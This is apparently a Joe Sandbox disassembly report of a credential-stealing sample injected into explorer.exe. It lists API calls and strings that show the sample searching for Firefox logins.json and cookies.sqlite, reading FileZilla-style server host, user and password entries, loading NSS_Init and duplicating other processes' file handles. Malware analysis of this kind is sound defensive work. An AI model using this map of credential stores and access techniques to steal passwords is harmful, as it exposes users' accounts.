                                                        • Opcode Fuzzy Hash: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                        • Instruction Fuzzy Hash: 75215C71208301BFD7099B21DC49EAFBBEDEF8A344F00892DF89992152DB75CD459B62
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                        • CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                        • String ID:
                                                        • API String ID: 2517252058-0
                                                        • Opcode ID: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                        • Instruction ID: 8869eff0aedb4585e5cfe9fd9f846d2800c3cea474541fe7e1c897e5fe57ff3c
                                                        • Opcode Fuzzy Hash: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                        • Instruction Fuzzy Hash: 2FF081312002187BD2241B25DC88FFF7A9CDB477B5F16061DF51592192EB539C458171
                                                        APIs
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                        • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                        • String ID:
                                                        • API String ID: 1066184869-0
                                                        • Opcode ID: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                        • Instruction ID: 37da3b80879da37bc67d4af4f669a1a9ad8ecdb0f523aff93c9fd86c8ed134e7
                                                        • Opcode Fuzzy Hash: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                        • Instruction Fuzzy Hash: 09018631204254ABC7159F21DC05EEF7FA9EFCA390F10442DF85992153DE758985EBA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ExitInitializeProcessUninitialize
                                                        • String ID:
                                                        • API String ID: 4175140541-0
                                                        • Opcode ID: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                        • Instruction ID: e31af23fe5809eada00f867ee4f4d181e9e93fedf537769018753eb4e94eddb2
                                                        • Opcode Fuzzy Hash: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                        • Instruction Fuzzy Hash: 5DC04C302851005BE6842BE05E1DB8D3598BB00712F008004F205854A1DB6244808622
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 000C9FF8
                                                        Strings
                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 000CA00E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                        • API String ID: 10892065-982776804
                                                        • Opcode ID: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
                                                        • Instruction ID: e715bdd9b239edc05242f7aebd258c497018237035b896384139ad43ec015729
                                                        • Opcode Fuzzy Hash: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
                                                        • Instruction Fuzzy Hash: 1BF0F672704345BAE7305B94AC8CF6F67DCD795789F20043DF945D3240E2706C428631
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                          • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                          • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 000C1B40
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                        • API String ID: 2162223993-2036018995
                                                        • Opcode ID: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
                                                        • Instruction ID: ba6ff228695c27fa0e95587fa3488995e2f62e52786e8c68b30e74e3f32379bf
                                                        • Opcode Fuzzy Hash: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
                                                        • Instruction Fuzzy Hash: 7CF0B43670064827D615AB2ACC84FEF768ECBD33A6316002DF41993243EF23AC915668
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(02660000,00000000,?), ref: 000C9EB5
                                                        Strings
                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 000C9ECD
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                        • API String ID: 1279760036-667713680
                                                        • Opcode ID: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
                                                        • Instruction ID: 75b594978964026cbc1719c2babe4ecb5b8b57bcb69ff72efe4b527b1532c5f2
                                                        • Opcode Fuzzy Hash: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
                                                        • Instruction Fuzzy Hash: 1AE0CD376041107BC12257446C05F5F7764DBA4F10F010019F90453651C3309C5287A1
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle
                                                        • String ID:
                                                        • API String ID: 3498533004-0
                                                        • Opcode ID: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
                                                        • Instruction ID: 54c4544992f8f1923c99968fc4dc665176b3479511f2df21b352beb30d5b6e3c
                                                        • Opcode Fuzzy Hash: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
                                                        • Instruction Fuzzy Hash: E8D0C771203230A2E5B923353D0CFEB2E6CDF03AB1F054618B60CD44D0E3218D8386E0
                                                        APIs
                                                        • HeapFree.KERNEL32(02660000,00000000,?), ref: 000C9EF8
                                                        Strings
                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 000C9F0E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                        • API String ID: 3298025750-4030396798
                                                        • Opcode ID: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
                                                        • Instruction ID: f2441149ca70ee939b8fe1d96a8109030f2138eee9c13a8f6c809ff235a10f20
                                                        • Opcode Fuzzy Hash: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
                                                        • Instruction Fuzzy Hash: CFD01276508241BBD6119B54AC45F2F77B9ABA5B00F44042CF104964A6D37554A3AB71
                                                        APIs
                                                          • Part of subcall function 000C1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 000C116F
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                        • String ID:
                                                        • API String ID: 2580854192-0
                                                        • Opcode ID: de5627ba02caadd833ba805bc2f845dac91f4491ec6113c940ec8d7d141d6c5f
                                                        • Instruction ID: bcd070ed24b4e4b53dfca3b274ede6127fbd012df32622d5fde6b25995508891
                                                        • Opcode Fuzzy Hash: de5627ba02caadd833ba805bc2f845dac91f4491ec6113c940ec8d7d141d6c5f
                                                        • Instruction Fuzzy Hash: FAC04C7144526066C9A427A47E0DFCE2B59DF8B262F094445B90597553CAA68C8186A0
                                                        APIs
                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryZero
                                                        • String ID:
                                                        • API String ID: 816449071-0
                                                        • Opcode ID: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
                                                        • Instruction ID: 7d68ba4ea28ba266cf2c5d120ee712bc90d8f352e3f6c553bbf1d70295c067c7
                                                        • Opcode Fuzzy Hash: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
                                                        • Instruction Fuzzy Hash: 7511E3B5A01209AFDB24DFA9E984EEEB7FCEB49341B104029F945E6241D7319A40CB60
                                                        APIs
                                                        • GetFileAttributesExW.KERNELBASE(00000000,00000000,?,?,00000000,-00080006), ref: 000CB848
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: c993734bedfbb6c6cd0e16370fbda6d121d01291b9820c922acbeea7a866fb41
                                                        • Instruction ID: d8df1341db1b2fccc899c72ee4e2b0084aab087b427d893dc35d4851c4450dcb
                                                        • Opcode Fuzzy Hash: c993734bedfbb6c6cd0e16370fbda6d121d01291b9820c922acbeea7a866fb41
                                                        • Instruction Fuzzy Hash: E9F06231A0421CAADB209BBE9C45FEEF7ECDB49768F104229F915F2091EB7089098691
                                                        APIs
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000C1684
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID:
                                                        • API String ID: 2244384528-0
                                                        • Opcode ID: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
                                                        • Instruction ID: 05cf46aa160d6539f5a83fde185778d3e14ae09a92089202867549f6638f93f9
                                                        • Opcode Fuzzy Hash: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
                                                        • Instruction Fuzzy Hash: DAC012301202219EE7601B209D09BCA36D8AF1A7A2F060929A081990C0E2F508C08A90
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,000C158A), ref: 000C1056
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
                                                        • Instruction ID: 6ced8ba81a80a37abd1a230f096ca294a1d38799ad107e7e8dc3420ce8496934
                                                        • Opcode Fuzzy Hash: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
                                                        • Instruction Fuzzy Hash: 61A002F07D67007AFD6D5762AF1FF5529389744F02F114244B34D7C4D095E97540852D
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,000C4A5B,?,?,00000000,?,?,?,?,000C4B66,?), ref: 000C1065
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
                                                        • Instruction ID: ea9c58852240352b8423ea4b75abe92339e5d7fb28c36c6259098a70c275598b
                                                        • Opcode Fuzzy Hash: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
                                                        • Instruction Fuzzy Hash: F4A0027069070076EDB857205E0AF4526146780B01F2185447641A94D18AA6E084CA18
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C34C0
                                                          • Part of subcall function 000C33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 000C3401
                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,000C37A8), ref: 000C34E9
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C351E
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C3541
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 000C3586
                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 000C358F
                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 000C35B6
                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 000C35DE
                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C35F6
                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C3606
                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 000C361E
                                                        • GetFileSize.KERNEL32(?,00000000), ref: 000C3631
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 000C3658
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 000C366B
                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C3681
                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 000C36AD
                                                        • CloseHandle.KERNEL32(?), ref: 000C36C0
                                                        • CloseHandle.KERNEL32(00000000), ref: 000C36F5
                                                          • Part of subcall function 000C1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 000C1CC0
                                                          • Part of subcall function 000C1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 000C1CDA
                                                          • Part of subcall function 000C1C9F: CloseHandle.KERNEL32(00000000), ref: 000C1CE6
                                                        • CloseHandle.KERNEL32(?), ref: 000C3707
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                        • String ID: File
                                                        • API String ID: 3915112439-749574446
                                                        • Opcode ID: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
                                                        • Instruction ID: e611380c84b8e800ad77419bd56dca3311fb691ad2757330bb5d87bb6a9d9bac
                                                        • Opcode Fuzzy Hash: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
                                                        • Instruction Fuzzy Hash: 30619370214300BFD7649F20CC85FAFBBE9EB88754F10892CF946D62A2D776DA848B51
                                                        APIs
                                                        • memcmp.NTDLL ref: 00114502
                                                        • memcmp.NTDLL ref: 0011475F
                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00114803
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcmp$memcpy
                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                        • API String ID: 231171946-1096842476
                                                        • Opcode ID: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
                                                        • Instruction ID: 0ae4a5864ec2897dd920d3a381ff2996a0ff21590144861ef0922d2565c29d7a
                                                        • Opcode Fuzzy Hash: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
                                                        • Instruction Fuzzy Hash: 18C1E4719083519BDB3CCF188490BFAB7D2AB9AB18F14053EF4D587292D724D8C5C796
                                                        APIs
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 000C2B3D
                                                        • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C2B63
                                                        • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C2B7B
                                                          • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 000C2BE7
                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 000C2C16
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C2C43
                                                        • FindClose.KERNEL32(00000000), ref: 000C2C52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                        • API String ID: 1108783765-3717368146
                                                        • Opcode ID: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
                                                        • Instruction ID: aafc04bb5f71a56d0c688c2381e3aaf9193852b0c09fd3335d0131dcf12101ad
                                                        • Opcode Fuzzy Hash: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
                                                        • Instruction Fuzzy Hash: 283190303043055BCB18AB709995FFE73DAAB89700B14893CB845D3693EF7ACD869252
                                                        APIs
                                                          • Part of subcall function 000C6AAA: memset.NTDLL ref: 000C6AC5
                                                        • memset.NTDLL ref: 000E5F53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                        • API String ID: 2221118986-594550510
                                                        • Opcode ID: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
                                                        • Instruction ID: 5d15dc0e707e90713246ede4f2e4703f2becd81512558dd9c05cf51217637031
                                                        • Opcode Fuzzy Hash: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
                                                        • Instruction Fuzzy Hash: 7DC1AD706087429FCB54DF26D480A6FB7E2BFD8740F04892DF855A7242DB32E956CB92
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 000C2127
                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 000C213A
                                                        • wsprintfA.USER32 ref: 000C214F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                        • String ID: %li
                                                        • API String ID: 4120667308-1021419598
                                                        • Opcode ID: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
                                                        • Instruction ID: 87b622b6f1c7054b961d268ef61acbadafc26ef617cff2d966bd51cf342a7809
                                                        • Opcode Fuzzy Hash: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
                                                        • Instruction Fuzzy Hash: 22E0D83264121877C7243BB89D06FEF7B6DDB80B55F004195F900E2586E6738AA483D5
                                                        APIs
                                                        • CoCreateInstance.OLE32(001162B0,00000000,00000001,001162A0,?), ref: 000C445F
                                                        • SysAllocString.OLEAUT32(?), ref: 000C44AA
                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 000C456E
                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 000C457D
                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 000C458C
                                                          • Part of subcall function 000C11E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,000C46E3), ref: 000C11ED
                                                          • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C120F
                                                          • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1231
                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 000C45BE
                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 000C45CD
                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 000C4657
                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 000C4679
                                                        • lstrcmpiW.KERNEL32(User,?), ref: 000C469F
                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 000C46C5
                                                        • wsprintfW.USER32 ref: 000C471E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                        • API String ID: 2230072276-1234691226
                                                        • Opcode ID: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
                                                        • Instruction ID: e843122c189cc5930bf12067dc9b5f1d3e7ad64f530fa00f5a5b4f521c672ced
                                                        • Opcode Fuzzy Hash: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
                                                        • Instruction Fuzzy Hash: 1BB1F571208302AFD744DF64C894F6AB7E9BF89745F00896CF5858B261DB72E846CB62
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                          • Part of subcall function 000C1090: lstrlenW.KERNEL32(?,?,00000000,000C17E5), ref: 000C1097
                                                          • Part of subcall function 000C1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000C10A8
                                                          • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 000C2503
                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 000C250A
                                                        • LoadLibraryW.KERNEL32(00000000), ref: 000C2563
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2570
                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 000C2591
